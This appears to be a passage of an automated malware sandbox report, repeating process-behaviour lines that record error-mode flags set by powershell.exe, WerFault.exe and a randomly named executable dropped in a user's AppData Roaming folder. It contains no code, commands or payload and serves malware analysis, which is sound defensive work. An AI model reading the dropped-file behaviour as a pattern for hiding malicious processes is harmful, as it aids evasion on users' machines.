Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
